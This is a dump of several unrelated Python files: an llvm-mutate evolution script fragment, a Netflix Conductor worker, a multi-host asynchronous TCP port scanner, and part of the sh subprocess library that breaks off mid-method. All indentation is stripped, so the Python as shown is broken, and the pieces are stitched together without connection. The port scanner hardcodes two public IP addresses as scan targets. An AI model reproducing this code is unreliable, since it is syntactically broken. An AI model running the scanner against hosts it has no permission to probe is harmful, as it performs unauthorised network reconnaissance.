print(f"m:(p:{self.evalStats['mut']['pass'][-1]},f:{self.evalStats['mut']['fail'][-1]}), "\
f"c:(p:{self.evalStats['cx']['pass'][-1]},f:{self.evalStats['cx']['fail'][-1]}), "\
f"e:(p:{self.evalStats['epi']['pass'][-1]},f:{self.evalStats['epi']['fail'][-1]})")
print(self.logbook.stream)
self.mutLog()
self.progressFile.write(f'{self.generation},{record["min"][0]},\n')
self.progressFile.flush()
self.updateSlideFromPlot()
self.writeStage()
print("") # an empty line as a generation separator
def stop_evolve(self):
sys.stderr = open(os.devnull, "w")
self.teminateEvent.set()
subprocess.run(['killall', self.appBinary])
subprocess.run(['killall', 'llvm-mutate'])
while len(self.threadPool) > 0:
self.threadPool = [ t for t in self.threadPool if t.is_alive() ]
time.sleep(0)
print(" Valid variant: {}".format(self.mutStats['valid']))
print(" Invalid variant: {}".format(self.mutStats['invalid']))
print("Infinite variant: {}".format(self.mutStats['infinite']))
self.mutLog()
if self.generation > 0:
self.presentation.save('progress.pptx')
|
ConductorWorker.py | #
# Copyright 2017 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, absolute_import
import sys
import time
from conductor.conductor import WFClientMgr
from threading import Thread
import socket
hostname = socket.gethostname()
class ConductorWorker:
"""
Main class for implementing Conductor Workers
A conductor worker is a separate system that executes the various
tasks that the conductor server queues up for execution. The worker
can run on the same instance as the server or on a remote instance.
The worker generally provides a wrapper around some function that
performs the actual execution of the task. The function that is
being executed must return a `dict` with the `status`, `output` and
`log` keys. If these keys are not present, the worker will raise an
Exception after completion of the task.
The start method is used to begin continous polling and execution
of the tasks that the conductor server makes available. The same
script can run multiple workers using the wait argument. For more
details, view the start method
"""
def __init__(self, server_url, thread_count, polling_interval, worker_id=None):
"""
Parameters
----------
server_url: str
The url to the server hosting the conductor api.
Ex: 'http://localhost:8080/api'
thread_count: int
The number of threads that will be polling for and
executing tasks in case of using the start method.
polling_interval: float
The number of seconds that each worker thread will wait
between polls to the conductor server.
worker_id: str, optional
The worker_id of the worker that is going to execute the
task. For further details, refer to the documentation
By default, it is set to hostname of the machine
"""
wfcMgr = WFClientMgr(server_url)
self.workflowClient = wfcMgr.workflowClient
self.taskClient = wfcMgr.taskClient
self.thread_count = thread_count
self.polling_interval = polling_interval
self.worker_id = worker_id or hostname
def execute(self, task, exec_function):
try:
resp = exec_function(task)
if type(resp) is not dict or not all(key in resp for key in ('status', 'output', 'logs')):
raise Exception('Task execution function MUST return a response as a dict with status, output and logs fields')
task['status'] = resp['status']
task['outputData'] = resp['output']
task['logs'] = resp['logs']
if 'reasonForIncompletion' in resp:
task['reasonForIncompletion'] = resp['reasonForIncompletion']
self.taskClient.updateTask(task)
except Exception as err:
print(f'Error executing task: {exec_function.__name__} with error: {str(err)}')
task['status'] = 'FAILED'
self.taskClient.updateTask(task)
def poll_and_execute(self, taskType, exec_function, domain=None):
while True:
time.sleep(float(self.polling_interval))
polled = self.taskClient.pollForTask(taskType, self.worker_id, domain)
if polled is not None:
self.taskClient.ackTask(polled['taskId'], self.worker_id)
self.execute(polled, exec_function)
def start(self, taskType, exec_function, wait, domain=None):
"""
start begins the continuous polling of the conductor server
Parameters
----------
taskType: str
The name of the task that the worker is looking to execute
exec_function: function
The function that the worker will execute. The function
must return a dict with the `status`, `output` and `logs`
keys present. If this is not present, an Exception will be
raised
wait: bool
Whether the worker will block execution of further code.
Since the workers are being run in daemon threads, when the
program completes execution, all the threads are destroyed.
Setting wait to True prevents the program from ending.
If multiple workers are being called from the same program,
all but the last start call but have wait set to False.
The last start call must always set wait to True. If a
single worker is being called, set wait to True.
domain: str, optional
The domain of the task under which the worker will run. For
further details refer to the conductor server documentation
By default, it is set to None
"""
print('Polling for task %s at a %f ms interval with %d threads for task execution, with worker id as %s' % (taskType, self.polling_interval * 1000, self.thread_count, self.worker_id))
for x in range(0, int(self.thread_count)):
thread = Thread(target=self.poll_and_execute, args=(taskType, exec_function, domain,))
thread.daemon = True
thread.start()
if wait:
while 1:
time.sleep(1)
def exc(taskType, inputData, startTime, retryCount, status, callbackAfterSeconds, pollCount):
print('Executing the function')
return {'status': 'COMPLETED', 'output': {}, 'logs': []}
def main():
cc = ConductorWorker('http://localhost:8080/api', 5, 0.1)
cc.start(sys.argv[1], exc, False)
cc.start(sys.argv[2], exc, True)
if __name__ == '__main__':
main()
|
ๅคๅฐๅ็ซฏๅฃๆซๆ[็บฟ็จ+ๅ็จ].py | import asyncio
import functools
import threading
# ็ซฏๅฃๆซๆ
class PortScan:
def __init__(self, ip_list, rate, all_ports=None):
super(PortScan, self).__init__()
self.ip_list = ip_list
self.rate = rate if rate else 500
self.scan_port_list = []
self.common_port = "21,22,23,25,53,69,80,81,82,83,84,85,86,87,88,89,110,111,135,139,143,161,389,443,445,465,513,873,993,995,1080,1099,1158,1433,1521,1533,1863,2049,2100,2181,3128,3306,3307,3308,3389,3690,5000,5432,5900,6379,7001,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031,8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047,8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8888,9000,9080,9090,9200,9300,9418,11211,27017,27018,27019,50060"
self.ports = [port for port in range(11, 65535)] if all_ports else self.common_port.split(',')
async def port_check(self, sem, ip_port):
async with sem:
ip, port = ip_port
conn = asyncio.open_connection(ip, port)
try:
_, _ = await asyncio.wait_for(conn, timeout=2)
return ip, port, 1
except:
return ip, port, 0
async def async_tcp_scan(self, ip, loop):
sem = asyncio.Semaphore(self.rate)
asyncio.set_event_loop(loop)
tasks = []
for port in self.ports:
one_ip_sacn_task = asyncio.ensure_future(self.port_check(sem, (ip, int(port))))
one_ip_sacn_task.add_done_callback(self.callback)
tasks.append(one_ip_sacn_task)
futus = asyncio.gather(*tasks)
def done_callback(loop,fufu):
loop.stop()
futus.add_done_callback(functools.partial(done_callback, loop))
# loop.run_until_complete(asyncio.wait(tasks))
def callback(self, future):
ip, port, status = future.result()
if status:
print(ip, port, status)
def thread_tcp_port_scan(self):
def start_loop(loop):
asyncio.set_event_loop(loop)
loop.run_forever()
for ip in self.ip_list:
sub_loop = asyncio.new_event_loop()
t = threading.Thread(target=start_loop, args=(sub_loop,))
t.start()
future = asyncio.run_coroutine_threadsafe(self.async_tcp_scan(ip, sub_loop), sub_loop)
# future.add_done_callback(close_loop(sub_loop))
import time
if __name__ == '__main__':
ip_list = ["127.0.0.1","106.75.227.164","14.116.225.3"]
now = time.time
start = now()
ps = PortScan(ip_list, 500)
# ps.async_tcp_scan(ip_list[0])
ps.thread_tcp_port_scan()
print("Time:", now() - start)
|
sh.py | """
http://amoffat.github.io/sh/
"""
#===============================================================================
# Copyright (C) 2011-2020 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#===============================================================================
__version__ = "1.13.1"
__project_url__ = "https://github.com/amoffat/sh"
import platform
if "windows" in platform.system().lower(): # pragma: no cover
raise ImportError("sh %s is currently only supported on linux and osx. \
please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \
support." % __version__)
import sys
IS_PY3 = sys.version_info[0] == 3
MINOR_VER = sys.version_info[1]
IS_PY26 = sys.version_info[0] == 2 and MINOR_VER == 6
import traceback
import os
import re
import time
import getpass
from types import ModuleType, GeneratorType
from functools import partial
import inspect
import tempfile
import warnings
import stat
from collections import deque
import glob as glob_module
import ast
from contextlib import contextmanager
import pwd
import errno
from io import UnsupportedOperation, open as fdopen
from locale import getpreferredencoding
DEFAULT_ENCODING = getpreferredencoding() or "UTF-8"
# normally i would hate this idea of using a global to signify whether we are
# running tests, because it breaks the assumption that what is running in the
# tests is what will run live, but we ONLY use this in a place that has no
# serious side-effects that could change anything. as long as we do that, it
# should be ok
RUNNING_TESTS = bool(int(os.environ.get("SH_TESTS_RUNNING", "0")))
FORCE_USE_SELECT = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0")))
if IS_PY3:
from io import StringIO
ioStringIO = StringIO
from io import BytesIO as cStringIO
iocStringIO = cStringIO
from queue import Queue, Empty
# for some reason, python 3.1 removed the builtin "callable", wtf
if not hasattr(__builtins__, "callable"):
def callable(ob):
return hasattr(ob, "__call__")
else:
from StringIO import StringIO
from cStringIO import OutputType as cStringIO
from io import StringIO as ioStringIO
from io import BytesIO as iocStringIO
from Queue import Queue, Empty
try:
from shlex import quote as shlex_quote # here from 3.3 onward
except ImportError:
from pipes import quote as shlex_quote # undocumented before 2.7
IS_MACOS = platform.system() in ("AIX", "Darwin")
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
SH_LOGGER_NAME = __name__
import errno
import pty
import termios
import signal
import gc
import select
import threading
import tty
import fcntl
import struct
import resource
from collections import deque
import logging
import weakref
# a re-entrant lock for pushd. this way, multiple threads that happen to use
# pushd will all see the current working directory for the duration of the
# with-context
PUSHD_LOCK = threading.RLock()
if hasattr(inspect, "getfullargspec"):
def get_num_args(fn):
return len(inspect.getfullargspec(fn).args)
else:
def get_num_args(fn):
return len(inspect.getargspec(fn).args)
if IS_PY3:
raw_input = input
unicode = str
basestring = str
long = int
_unicode_methods = set(dir(unicode()))
HAS_POLL = hasattr(select, "poll")
POLLER_EVENT_READ = 1
POLLER_EVENT_WRITE = 2
POLLER_EVENT_HUP = 4
POLLER_EVENT_ERROR = 8
# here we use an use a poller interface that transparently selects the most
# capable poller (out of either select.select or select.poll). this was added
# by zhangyafeikimi when he discovered that if the fds created internally by sh
# numbered > 1024, select.select failed (a limitation of select.select). this
# can happen if your script opens a lot of files
if HAS_POLL and not FORCE_USE_SELECT:
class Poller(object):
def __init__(self):
self._poll = select.poll()
# file descriptor <-> file object bidirectional maps
self.fd_lookup = {}
self.fo_lookup = {}
def __nonzero__(self):
return len(self.fd_lookup) != 0
def __len__(self):
return len(self.fd_lookup)
def _set_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
self.fd_lookup[fd] = f
self.fo_lookup[f] = fd
else:
self.fd_lookup[f] = f
self.fo_lookup[f] = f
def _remove_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
del self.fd_lookup[fd]
del self.fo_lookup[f]
else:
del self.fd_lookup[f]
del self.fo_lookup[f]
def _get_file_descriptor(self, f):
return self.fo_lookup.get(f)
def _get_file_object(self, fd):
return self.fd_lookup.get(fd)
def _register(self, f, events):
# f can be a file descriptor or file object
self._set_fileobject(f)
fd = self._get_file_descriptor(f)
self._poll.register(fd, events)
def register_read(self, f):
self._register(f, select.POLLIN | select.POLLPRI)
def register_write(self, f):
self._register(f, select.POLLOUT)
def register_error(self, f):
self._register(f, select.POLLERR | select.POLLHUP | select.POLLNVAL)
def unregister(self, f):
fd = self._get_file_descriptor(f)
self._poll.unregister(fd)
self._remove_fileobject(f)
def poll(self, timeout):
if timeout is not None:
# convert from seconds to milliseconds
timeout *= 1000
changes = self._poll.poll(timeout)
results = []
for fd, events in changes:
f = self._get_file_object(fd)
if events & (select.POLLIN | select.POLLPRI):
results.append((f, POLLER_EVENT_READ))
elif events & (select.POLLOUT):
results.append((f, POLLER_EVENT_WRITE))
elif events & (select.POLLHUP):
results.append((f, POLLER_EVENT_HUP))
elif events & (select.POLLERR | select.POLLNVAL):
results.append((f, POLLER_EVENT_ERROR))
return results
else:
class Poller(object):
def __init__(self):
self.rlist = []
self.wlist = []
self.xlist = []
def __nonzero__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist) != 0
def __len__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist)
def _register(self, f, l):
if f not in l:
l.append(f)
def _unregister(self, f, l):
if f in l:
l.remove(f)
def register_read(self, f):
self._register(f, self.rlist)
def register_write(self, f):
self._register(f, self.wlist)
def register_error(self, f):
self._register(f, self.xlist)
def unregister(self, f):
self._unregister(f, self.rlist)
self._unregister(f, self.wlist)
self._unregister(f, self.xlist)
def poll(self, timeout):
_in, _out, _err = select.select(self.rlist, self.wlist, self.xlist, timeout)
results = []
for f in _in:
results.append((f, POLLER_EVENT_READ))
for f in _out:
results.append((f, POLLER_EVENT_WRITE))
for f in _err:
results.append((f, POLLER_EVENT_ERROR))
return results
def encode_to_py3bytes_or_py2str(s):
""" takes anything and attempts to return a py2 string or py3 bytes. this
is typically used when creating command + arguments to be executed via
os.exec* """
fallback_encoding = "utf8"
if IS_PY3:
# if we're already bytes, do nothing
if isinstance(s, bytes):
pass
else:
s = str(s)
try:
s = bytes(s, DEFAULT_ENCODING)
except UnicodeEncodeError:
s = bytes(s, fallback_encoding)
else:
# attempt to convert the thing to unicode from the system's encoding
try:
s = unicode(s, DEFAULT_ENCODING)
# if the thing is already unicode, or it's a number, it can't be
# coerced to unicode with an encoding argument, but if we leave out
# the encoding argument, it will convert it to a string, then to unicode
except TypeError:
s = unicode(s)
# now that we have guaranteed unicode, encode to our system encoding,
# but attempt to fall back to something
try:
s = s.encode(DEFAULT_ENCODING)
except:
s = s.encode(fallback_encoding, "replace")
return s
def _indent_text(text, num=4):
lines = []
for line in text.split("\n"):
line = (" " * num) + line
lines.append(line)
return "\n".join(lines)
class ForkException(Exception):
def __init__(self, orig_exc):
tmpl = """
Original exception:
===================
%s
"""
msg = tmpl % _indent_text(orig_exc)
Exception.__init__(self, msg)
class ErrorReturnCodeMeta(type):
""" a metaclass which provides the ability for an ErrorReturnCode (or
derived) instance, imported from one sh module, to be considered the
subclass of ErrorReturnCode from another module. this is mostly necessary
in the tests, where we do assertRaises, but the ErrorReturnCode that the
program we're testing throws may not be the same class that we pass to
assertRaises
"""
def __subclasscheck__(self, o):
other_bases = set([b.__name__ for b in o.__bases__])
return self.__name__ in other_bases or o.__name__ == self.__name__
class ErrorReturnCode(Exception):
__metaclass__ = ErrorReturnCodeMeta
""" base class for all exceptions as a result of a command's exit status
being deemed an error. this base class is dynamically subclassed into
derived classes with the format: ErrorReturnCode_NNN where NNN is the exit
code number. the reason for this is it reduces boiler plate code when
testing error return codes:
try:
some_cmd()
except ErrorReturnCode_12:
print("couldn't do X")
vs:
try:
some_cmd()
except ErrorReturnCode as e:
if e.exit_code == 12:
print("couldn't do X")
it's not much of a savings, but i believe it makes the code easier to read """
truncate_cap = 750
def __reduce__(self):
return (self.__class__, (self.full_cmd, self.stdout, self.stderr, self.truncate))
def __init__(self, full_cmd, stdout, stderr, truncate=True):
self.full_cmd = full_cmd
self.stdout = stdout
self.stderr = stderr
self.truncate = truncate
exc_stdout = self.stdout
if truncate:
exc_stdout = exc_stdout[:self.truncate_cap]
out_delta = len(self.stdout) - len(exc_stdout)
if out_delta:
exc_stdout += ("... (%d more, please see e.stdout)" % out_delta).encode()
exc_stderr = self.stderr
if truncate:
exc_stderr = exc_stderr[:self.truncate_cap]
err_delta = len(self.stderr) - len(exc_stderr)
if err_delta:
exc_stderr += ("... (%d more, please see e.stderr)" % err_delta).encode()
msg_tmpl = unicode("\n\n RAN: {cmd}\n\n STDOUT:\n{stdout}\n\n STDERR:\n{stderr}")
msg = msg_tmpl.format(
cmd=self.full_cmd,
stdout=exc_stdout.decode(DEFAULT_ENCODING, "replace"),
stderr=exc_stderr.decode(DEFAULT_ENCODING, "replace")
)
if not IS_PY3:
# Exception messages should be treated as an API which takes native str type on both
# Python2 and Python3. (Meaning, it's a byte string on Python2 and a text string on
# Python3)
msg = encode_to_py3bytes_or_py2str(msg)
super(ErrorReturnCode, self).__init__(msg)
class SignalException(ErrorReturnCode): pass
class TimeoutException(Exception):
""" the exception thrown when a command is killed because a specified
timeout (via _timeout or .wait(timeout)) was hit """
def __init__(self, exit_code, full_cmd):
self.exit_code = exit_code
self.full_cmd = full_cmd
super(Exception, self).__init__()
SIGNALS_THAT_SHOULD_THROW_EXCEPTION = set((
signal.SIGABRT,
signal.SIGBUS,
signal.SIGFPE,
signal.SIGILL,
signal.SIGINT,
signal.SIGKILL,
signal.SIGPIPE,
signal.SIGQUIT,
signal.SIGSEGV,
signal.SIGTERM,
signal.SIGSYS,
))
# we subclass AttributeError because:
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
class CommandNotFound(AttributeError): pass
rc_exc_regex = re.compile(r"(ErrorReturnCode|SignalException)_((\d+)|SIG[a-zA-Z]+)")
rc_exc_cache = {}
SIGNAL_MAPPING = {}
for k,v in signal.__dict__.items():
if re.match(r"SIG[a-zA-Z]+", k):
SIGNAL_MAPPING[v] = k
def get_exc_from_name(name):
""" takes an exception name, like:
ErrorReturnCode_1
SignalException_9
SignalException_SIGHUP
and returns the corresponding exception. this is primarily used for
importing exceptions from sh into user code, for instance, to capture those
exceptions """
exc = None
try:
return rc_exc_cache[name]
except KeyError:
m = rc_exc_regex.match(name)
if m:
base = m.group(1)
rc_or_sig_name = m.group(2)
if base == "SignalException":
try:
rc = -int(rc_or_sig_name)
except ValueError:
rc = -getattr(signal, rc_or_sig_name)
else:
rc = int(rc_or_sig_name)
exc = get_rc_exc(rc)
return exc
def get_rc_exc(rc):
""" takes a exit code or negative signal number and produces an exception
that corresponds to that return code. positive return codes yield
ErrorReturnCode exception, negative return codes yield SignalException
we also cache the generated exception so that only one signal of that type
exists, preserving identity """
try:
return rc_exc_cache[rc]
except KeyError:
pass
if rc > 0:
name = "ErrorReturnCode_%d" % rc
base = ErrorReturnCode
else:
signame = SIGNAL_MAPPING[abs(rc)]
name = "SignalException_" + signame
base = SignalException
exc = ErrorReturnCodeMeta(name, (base,), {"exit_code": rc})
rc_exc_cache[rc] = exc
return exc
# we monkey patch glob. i'm normally generally against monkey patching, but i
# decided to do this really un-intrusive patch because we need a way to detect
# if a list that we pass into an sh command was generated from glob. the reason
# being that glob returns an empty list if a pattern is not found, and so
# commands will treat the empty list as no arguments, which can be a problem,
# ie:
#
# ls(glob("*.ojfawe"))
#
# ^ will show the contents of your home directory, because it's essentially
# running ls([]) which, as a process, is just "ls".
#
# so we subclass list and monkey patch the glob function. nobody should be the
# wiser, but we'll have results that we can make some determinations on
_old_glob = glob_module.glob
class GlobResults(list):
def __init__(self, path, results):
self.path = path
list.__init__(self, results)
def glob(path, *args, **kwargs):
expanded = GlobResults(path, _old_glob(path, *args, **kwargs))
return expanded
glob_module.glob = glob
def canonicalize(path):
return os.path.abspath(os.path.expanduser(path))
def which(program, paths=None):
""" takes a program name or full path, plus an optional collection of search
paths, and returns the full path of the requested executable. if paths is
specified, it is the entire list of search paths, and the PATH env is not
used at all. otherwise, PATH env is used to look for the program """
def is_exe(fpath):
return (os.path.exists(fpath) and
os.access(fpath, os.X_OK) and
os.path.isfile(os.path.realpath(fpath)))
found_path = None
fpath, fname = os.path.split(program)
# if there's a path component, then we've specified a path to the program,
# and we should just test if that program is executable. if it is, return
if fpath:
program = canonicalize(program)
if is_exe(program):
found_path = program
# otherwise, we've just passed in the program name, and we need to search
# the paths to find where it actually lives
else:
paths_to_search = []
if isinstance(paths, (tuple, list)):
paths_to_search.extend(paths)
else:
env_paths = os.environ.get("PATH", "").split(os.pathsep)
paths_to_search.extend(env_paths)
for path in paths_to_search:
exe_file = os.path.join(canonicalize(path), program)
if is_exe(exe_file):
found_path = exe_file
break
return found_path
def resolve_command_path(program):
path = which(program)
if not path:
# our actual command might have a dash in it, but we can't call
# that from python (we have to use underscores), so we'll check
# if a dash version of our underscore command exists and use that
# if it does
if "_" in program:
path = which(program.replace("_", "-"))
if not path:
return None
return path
def resolve_command(name, baked_args=None):
path = resolve_command_path(name)
cmd = None
if path:
cmd = Command(path)
if baked_args:
cmd = cmd.bake(**baked_args)
return cmd
class Logger(object):
""" provides a memory-inexpensive logger. a gotcha about python's builtin
logger is that logger objects are never garbage collected. if you create a
thousand loggers with unique names, they'll sit there in memory until your
script is done. with sh, it's easy to create loggers with unique names if
we want our loggers to include our command arguments. for example, these
are all unique loggers:
ls -l
ls -l /tmp
ls /tmp
so instead of creating unique loggers, and without sacrificing logging
output, we use this class, which maintains as part of its state, the logging
"context", which will be the very unique name. this allows us to get a
logger with a very general name, eg: "command", and have a unique name
appended to it via the context, eg: "ls -l /tmp" """
def __init__(self, name, context=None):
self.name = name
self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name))
self.set_context(context)
def _format_msg(self, msg, *args):
if self.context:
msg = "%s: %s" % (self.context, msg)
return msg % args
def set_context(self, context):
if context:
context = context.replace("%", "%%")
self.context = context or ""
def get_child(self, name, context):
new_name = self.name + "." + name
new_context = self.context + "." + context
l = Logger(new_name, new_context)
return l
def info(self, msg, *args):
self.log.info(self._format_msg(msg, *args))
def debug(self, msg, *args):
self.log.debug(self._format_msg(msg, *args))
def error(self, msg, *args):
self.log.error(self._format_msg(msg, *args))
def exception(self, msg, *args):
self.log.exception(self._format_msg(msg, *args))
def default_logger_str(cmd, call_args, pid=None):
if pid:
s = "<Command %r, pid %d>" % (cmd, pid)
else:
s = "<Command %r>" % cmd
return s
class RunningCommand(object):
""" this represents an executing Command object. it is returned as the
result of __call__() being executed on a Command instance. this creates a
reference to a OProc instance, which is a low-level wrapper around the
process that was exec'd
this is the class that gets manipulated the most by user code, and so it
implements various convenience methods and logical mechanisms for the
underlying process. for example, if a user tries to access a
backgrounded-process's stdout/err, the RunningCommand object is smart enough
to know to wait() on the process to finish first. and when the process
finishes, RunningCommand is smart enough to translate exit codes to
exceptions. """
# these are attributes that we allow to passthrough to OProc
_OProc_attr_whitelist = set((
"signal",
"terminate",
"kill",
"kill_group",
"signal_group",
"pid",
"sid",
"pgid",
"ctty",
"input_thread_exc",
"output_thread_exc",
"bg_thread_exc",
))
def __init__(self, cmd, call_args, stdin, stdout, stderr):
"""
cmd is a list, where each element is encoded as bytes (PY3) or str (PY2)
"""
# self.ran is used for auditing what actually ran. for example, in
# exceptions, or if you just want to know what was ran after the
# command ran
#
# here we're making a consistent unicode string out if our cmd.
# we're also assuming (correctly, i think) that the command and its
# arguments are the encoding we pass into _encoding, which falls back to
# the system's encoding
enc = call_args["encoding"]
self.ran = " ".join([shlex_quote(arg.decode(enc, "ignore")) for arg in cmd])
self.call_args = call_args
self.cmd = cmd
self.process = None
self._waited_until_completion = False
should_wait = True
spawn_process = True
# this is used to track if we've already raised StopIteration, and if we
# have, raise it immediately again if the user tries to call next() on
# us. https://github.com/amoffat/sh/issues/273
self._stopped_iteration = False
# with contexts shouldn't run at all yet, they prepend
# to every command in the context
if call_args["with"]:
spawn_process = False
get_prepend_stack().append(self)
if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
should_wait = False
# we're running in the background, return self and let us lazily
# evaluate
if call_args["bg"]:
should_wait = False
# redirection
if call_args["err_to_out"]:
stderr = OProc.STDOUT
done_callback = call_args["done"]
if done_callback:
call_args["done"] = partial(done_callback, self)
# set up which stream should write to the pipe
# TODO, make pipe None by default and limit the size of the Queue
# in oproc.OProc
pipe = OProc.STDOUT
if call_args["iter"] == "out" or call_args["iter"] is True:
pipe = OProc.STDOUT
elif call_args["iter"] == "err":
pipe = OProc.STDERR
if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True:
pipe = OProc.STDOUT
elif call_args["iter_noblock"] == "err":
pipe = OProc.STDERR
# there's currently only one case where we wouldn't spawn a child
# process, and that's if we're using a with-context with our command
self._spawned_and_waited = False
if spawn_process:
log_str_factory = call_args["log_msg"] or default_logger_str
logger_str = log_str_factory(self.ran, call_args)
self.log = Logger("command", logger_str)
self.log.debug("starting process")
if should_wait:
self._spawned_and_waited = True
# this lock is needed because of a race condition where a background
# thread, created in the OProc constructor, may try to access
# self.process, but it has not been assigned yet
process_assign_lock = threading.Lock()
with process_assign_lock:
self.process = OProc(self, self.log, cmd, stdin, stdout, stderr,
self.call_args, pipe, process_assign_lock)
logger_str = log_str_factory(self.ran, call_args, self.process.pid)
self.log.set_context(logger_str)
self.log.info("process started")
if should_wait:
self.wait()
def wait(self, timeout=None):
""" waits for the running command to finish. this is called on all
running commands, eventually, except for ones that run in the background
if timeout is a number, it is the number of seconds to wait for the process to resolve. otherwise block on wait.
this function can raise a TimeoutException, either because of a `_timeout` on the command itself as it was
launched, or because of a timeout passed into this method.
"""
if not self._waited_until_completion:
# if we've been given a timeout, we need to poll is_alive()
if timeout is not None:
waited_for = 0
sleep_amt = 0.1
if timeout < 0:
raise RuntimeError("timeout cannot be negative")
# while we still have time to wait, run this loop
# notice that alive and exit_code are only defined in this loop, but the loop is also guaranteed to run,
# defining them, given the constraints that timeout is non-negative
while waited_for <= timeout:
alive, exit_code = self.process.is_alive()
# if we're alive, we need to wait some more, but let's sleep before we poll again
if alive:
time.sleep(sleep_amt)
waited_for += sleep_amt
# but if we're not alive, we're done waiting
else:
break
# if we've made it this far, and we're still alive, then it means we timed out waiting
if alive:
raise TimeoutException(None, self.ran)
# if we didn't time out, we fall through and let the rest of the code handle exit_code.
# notice that we set _waited_until_completion here, only if we didn't time out. this allows us to
# re-wait again on timeout, if we catch the TimeoutException in the parent frame
self._waited_until_completion = True
else:
exit_code = self.process.wait()
self._waited_until_completion = True
if self.process.timed_out:
# if we timed out, our exit code represents a signal, which is
# negative, so let's make it positive to store in our
# TimeoutException
raise TimeoutException(-exit_code, self.ran)
else:
self.handle_command_exit_code(exit_code)
# if an iterable command is using an instance of OProc for its stdin,
# wait on it. the process is probably set to "piped", which means it
# won't be waited on, which means exceptions won't propagate up to the
# main thread. this allows them to bubble up
if self.process._stdin_process:
self.process._stdin_process.command.wait()
self.log.debug("process completed")
return self
def is_alive(self):
""" returns whether or not we're still alive. this call has side-effects on OProc """
return self.process.is_alive()[0]
def handle_command_exit_code(self, code):
""" here we determine if we had an exception, or an error code that we
weren't expecting to see. if we did, we create and raise an exception
"""
ca = self.call_args
exc_class = get_exc_exit_code_would_raise(code, ca["ok_code"],
ca["piped"])
if exc_class:
exc = exc_class(self.ran, self.process.stdout, self.process.stderr,
ca["truncate_exc"])
raise exc
@property
def stdout(self):
self.wait()
return self.process.stdout
@property
def stderr(self):
self.wait()
return self.process.stderr
@property
def exit_code(self):
self.wait()
return self.process.exit_code
def __len__(self):
return len(str(self))
def __enter__(self):
""" we don't actually do anything here because anything that should have
been done would have been done in the Command.__call__ call.
essentially all that has to happen is the comand be pushed on the
prepend stack. """
pass
def __iter__(self):
return self
def next(self):
""" allow us to iterate over the output of our command """
if self._stopped_iteration:
raise StopIteration()
# we do this because if get blocks, we can't catch a KeyboardInterrupt
# so the slight timeout allows for that.
while True:
try:
chunk = self.process._pipe_queue.get(True, self.call_args["iter_poll_time"])
except Empty:
if self.call_args["iter_noblock"]:
return errno.EWOULDBLOCK
else:
if chunk is None:
self.wait()
self._stopped_iteration = True
raise StopIteration()
try:
return chunk.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
except UnicodeDecodeError:
return chunk
# python 3
__next__ = next
def __exit__(self, typ, value, traceback):
if self.call_args["with"] and get_prepend_stack():
get_prepend_stack().pop()
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return unicode(self).encode(self.call_args["encoding"])
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
RunningCommand object will call this """
if self.process and self.stdout:
return self.stdout.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
elif IS_PY3:
return ""
else:
return unicode("")
def __eq__(self, other):
return unicode(self) == unicode(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __contains__(self, item):
return item in str(self)
def __getattr__(self, p):
# let these three attributes pass through to the OProc object
if p in self._OProc_attr_whitelist:
if self.process:
return getattr(self.process, p)
else:
raise AttributeError
# see if strings have what we're looking for. we're looking at the
# method names explicitly because we don't want to evaluate self unless
# we absolutely have to, the reason being, in python2, hasattr swallows
# exceptions, and if we try to run hasattr on a command that failed and
# is being run with _iter=True, the command will be evaluated, throw an
# exception, but hasattr will discard it
if p in _unicode_methods:
return getattr(unicode(self), p)
raise AttributeError
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
try:
return str(self)
except UnicodeDecodeError:
if self.process:
if self.stdout:
return repr(self.stdout)
return repr("")
def __long__(self):
return long(str(self).strip())
def __float__(self):
return float(str(self).strip())
def __int__(self):
